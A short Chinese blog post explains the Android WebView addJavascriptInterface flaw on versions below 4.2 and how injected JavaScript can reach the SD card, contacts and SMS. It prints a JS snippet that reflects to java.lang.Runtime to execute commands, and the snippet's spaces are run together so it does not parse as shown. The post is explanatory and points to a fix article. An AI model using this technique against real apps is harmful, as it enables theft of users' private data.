什么漏洞？

用addJSI这个方法在4.2之下导致不安全，因为js可能包含恶意代码。

包含恶意代码可以干什么？

可以访问你设备sd卡上任何信息，甚至是联系人信息，短信。不信？可以去问问汤海宏H5不在app帮助下如何拿手机图片。

这个漏洞是怎么出现的？

1、WebView添加了JS对象，并且当前应用具备SD卡读写权限：android.permission.WRITE_EXTERNAL_STORAGE

2、JS可以遍历Window对象，找到含有getClass方法的对象的对象，然后反射得到RUNTIME对象，调用静态方法来执行一些命令，比如访问文件；

3、通过访问文件命令返回的输入流中得到字符串，就可以得到文件名信息，就可以干一些事。

核心JS代码如下：

functionexecute(cmdArgs)

{

for(varobjinwindow) {

if("getClass"inwindow[obj]) {

alert(obj);

returnwindow[obj].getClass().forName("java.lang.Runtime")

.getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

}

}

}

如何解决，看我另外一篇文章JSBridge